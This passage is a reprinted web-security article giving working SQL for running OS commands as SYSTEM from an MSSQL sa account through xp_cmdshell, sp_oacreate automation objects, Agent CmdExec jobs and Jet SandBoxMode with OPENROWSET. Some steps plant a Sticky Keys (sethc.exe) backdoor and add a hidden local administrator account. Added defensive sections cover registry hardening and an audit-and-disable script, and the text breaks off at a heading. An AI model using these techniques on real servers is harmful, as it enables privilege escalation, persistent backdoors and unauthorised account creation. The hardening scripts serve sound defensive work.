Reprinted, source: BK instant group
First published in: Web Security Manual
////////////////////////////////////////////////////////////////////////////////
Summary of command execution methods with sa
By invincible cucumber
////////////////////////////////////////////////////////////////////////////////
Test environment: Windows XP Pro SP2 + MSSQL 2005 (the SQL Server service runs as SYSTEM, so every technique below executes commands as SYSTEM)
1. xp_cmdshell
EXEC master..xp_cmdshell 'ipconfig'
Enable xp_cmdshell (it is disabled by default on SQL Server 2005, so a fresh install returns error 15281 until this is done):
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
2. sp_oacreate
Create a WScript.Shell object and run a command through it:
USE master
DECLARE @o INT
EXEC sp_oacreate 'WScript.Shell', @o OUT
EXEC sp_oamethod @o, 'Run', NULL, 'cmd /c "net user" > c:\test.tmp'
Create a Scripting.FileSystemObject object and use it to copy files. The first copy replaces sethc.exe (the Sticky Keys helper launched by pressing Shift five times at the logon screen, running as SYSTEM); the second overwrites the copy in dllcache so that Windows File Protection does not restore the original:
DECLARE @o INT
EXEC sp_oacreate 'Scripting.FileSystemObject', @o OUT
EXEC sp_oamethod @o, 'CopyFile', NULL, 'C:\windows\explorer.exe', 'C:\windows\system32\sethc.exe';
DECLARE @oo INT
EXEC sp_oacreate 'Scripting.FileSystemObject', @oo OUT
EXEC sp_oamethod @oo, 'CopyFile', NULL, 'C:\windows\system32\sethc.exe', 'C:\windows\system32\dllcache\sethc.exe';
Replacing utilman.exe instead of sethc.exe gives the same effect. A neat backdoor, isn't it?
Create a Shell.Application object:
DECLARE @o INT
EXEC sp_oacreate 'Shell.Application', @o OUT
EXEC sp_oamethod @o, 'ShellExecute', NULL, 'cmd.exe', 'cmd /c net user > c:\test.txt', 'C:\windows\system32', '', 1;
Enable OLE Automation Procedures (also disabled by default on SQL Server 2005; sp_oacreate fails with error 15281 until it is turned on):
EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
EXEC sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
The countermeasure on the defending side is to cripple the automation objects themselves.
WScript.Shell can call into the system to run basic DOS commands.
You can rename the component in the registry so that scripts can no longer create it by its usual name:
HKEY_CLASSES_ROOT\WScript.Shell
and HKEY_CLASSES_ROOT\WScript.Shell.1
Rename them to something else, for example WScript.Shell_ChangeName and WScript.Shell.1_ChangeName;
your own code can still create the component under the new name.
Also change the CLSID value:
the value of HKEY_CLASSES_ROOT\WScript.Shell\CLSID
the value of HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID
Do the same for Scripting.FileSystemObject and Shell.Application as for WScript.Shell.
Caveat: renaming only breaks the ProgID lookup. sp_oacreate also accepts a CLSID string in place of a ProgID, so an attacker who knows the class GUID still reaches the object under HKEY_CLASSES_ROOT\CLSID. The reliable fix is to leave 'Ole Automation Procedures' at 0 and to keep the SQL Server service off the SYSTEM account; the registry rename is defence in depth on top of that.
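A quick way to verify the countermeasure from inside SQL Server is to try to instantiate each of the three ProgIDs and report the HRESULT. This is an added check, not part of the original article; it assumes you are sysadmin, that 'Ole Automation Procedures' is still enabled while you test (if it is not, sp_oacreate itself fails with error 15281, which is the stronger fix anyway), and that you run it on SQL Server 2005 or later.

```sql
-- Added check (not from the original article): after renaming the ProgIDs in
-- HKEY_CLASSES_ROOT, confirm that none of the automation objects used above
-- can still be created through sp_OACreate. Assumes sysadmin and that
-- 'Ole Automation Procedures' is enabled for the duration of the test.
USE master;
GO
DECLARE @progids TABLE (progid sysname);
-- The three ProgIDs the renaming countermeasure is meant to break.
INSERT INTO @progids VALUES ('WScript.Shell');
INSERT INTO @progids VALUES ('Scripting.FileSystemObject');
INSERT INTO @progids VALUES ('Shell.Application');

DECLARE @progid sysname, @obj INT, @hr INT, @src VARCHAR(255), @desc VARCHAR(255);
DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT progid FROM @progids;
OPEN c;
FETCH NEXT FROM c INTO @progid;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @obj = NULL;
    -- sp_OACreate returns 0 on success, otherwise the OLE HRESULT as an int.
    EXEC @hr = sp_OACreate @progid, @obj OUT;
    IF @hr = 0
    BEGIN
        PRINT @progid + ': STILL CREATABLE - the rename did not take effect';
        EXEC sp_OADestroy @obj;
    END
    ELSE
    BEGIN
        -- With a NULL token, sp_OAGetErrorInfo describes the most recent failure.
        EXEC sp_OAGetErrorInfo NULL, @src OUT, @desc OUT;
        PRINT @progid + ': blocked (hr=' + CONVERT(VARCHAR(20), @hr) + ') '
              + ISNULL(@desc, '');
    END
    FETCH NEXT FROM c INTO @progid;
END
CLOSE c;
DEALLOCATE c;
```

Run it once before and once after editing the registry; any line still reporting "STILL CREATABLE" means that ProgID (or a CLSID it still resolves to) remains usable by the sp_oacreate technique above. Because sp_OACreate also accepts a CLSID, add the bare GUIDs of the classes to the table if you want to prove the CLSID path is closed too.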
3. JOB
Using a JOB to execute commands requires the SQLSERVERAGENT service to be running. It can be started with:
EXEC master.dbo.xp_servicecontrol 'start', 'SQLSERVERAGENT'
A CmdExec job step created by a sysadmin runs in the security context of the Agent service account (SYSTEM in the test environment). Create the job, attach a CmdExec step to it, bind it to the local server and start it:
USE msdb
CREATE TABLE [jncsql] (resulttxt NVARCHAR(1024) NULL)
EXEC sp_delete_job NULL, 'X'
EXEC sp_add_job 'X'
EXEC sp_add_jobstep NULL, 'X', NULL, '1', 'CMDEXEC', 'cmd /c "net user > c:\test.test"'
EXEC sp_add_jobserver NULL, 'X', @@servername
EXEC sp_start_job 'X';
4. SandBoxMode
Principle: call the VBA Shell() function through the Jet engine (Access) and run arbitrary commands with the SQL Server service's SYSTEM privileges. Before this works, the SandBoxMode switch in the registry must be turned off.
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\Engines\SandBoxMode. The default value is 2. Meaning of the values: 0, the sandbox is disabled at all times; 1, the sandbox is applied to Access applications only, not to other hosts; 2, the sandbox is applied to non-Access hosts (such as SQL Server) only; 3, the sandbox is always on. // commands can be executed with 0 or 1
EXEC sp_addlinkedserver 'testsql', 'OLE DB Provider for Jet', 'Microsoft.Jet.OLEDB.4.0', 'c:\windows\system32\ias\ias.mdb'
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test /add")')
SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup administrators test /add")')
Note that on SQL Server 2005 an ad hoc OPENROWSET against an OLE DB provider also requires EXEC sp_configure 'Ad Hoc Distributed Queries', 1 (off by default); without it, query the same Shell() call through the linked server registered above with OPENQUERY instead.
The following two .mdb files ship with the system and can be used as the Database argument:
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
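For the defender, the four techniques above reduce to four configuration surfaces: the xp_cmdshell and Ole Automation Procedures options, a running SQL Server Agent with CmdExec job steps, and the Jet provider reachable through OPENROWSET (Ad Hoc Distributed Queries) or a linked server with the sandbox switched off. The following audit-and-harden script is an added example, not part of the original article; it assumes sysadmin rights on SQL Server 2005 or later on Windows, and that the Jet default of 2 (as stated above) is the value to restore.

```sql
-- Added audit script (not from the original article). Assumes sysadmin on
-- SQL Server 2005+ on Windows. First reports each command-execution surface
-- discussed above, then applies the corrected (closed) configuration.
USE master;
GO
-- Sections 1, 2 and 4: server options behind xp_cmdshell, sp_OACreate and
-- ad hoc OPENROWSET. value_in_use = 1 means the surface is open right now.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');

-- Section 3: is SQL Server Agent running, and does any job carry a CmdExec
-- step? Steps created by the technique above show up here with their command.
EXEC master..xp_servicecontrol 'querystate', 'SQLSERVERAGENT';
SELECT j.name AS job_name, j.date_created, s.step_name, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem = 'CmdExec';

-- Section 4: Jet sandbox mode (0 or 1 lets Shell() run from SQL Server) and
-- any linked server that points at the Jet provider.
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode';
SELECT name, provider, data_source
FROM sys.servers
WHERE provider = 'Microsoft.Jet.OLEDB.4.0';
GO

-- Hardening: the corrected configuration. Each option set to 0 closes the
-- corresponding technique; RECONFIGURE makes the change take effect.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
-- Restore the Jet default (2: sandbox applied to non-Access hosts such as
-- SQL Server), undoing the xp_regwrite from the SandBoxMode technique.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 2;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO
```

Drop any CmdExec job and Jet linked server the audit reports that you did not create yourself (sp_delete_job and sp_dropserver), and remember that none of this helps while the service account is SYSTEM: each option above only hides a door that a sysadmin login can reopen with the same sp_configure calls the article shows, so the durable fixes are a low-privilege service account and no sa-equivalent logins for applications.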
Summary
The preceding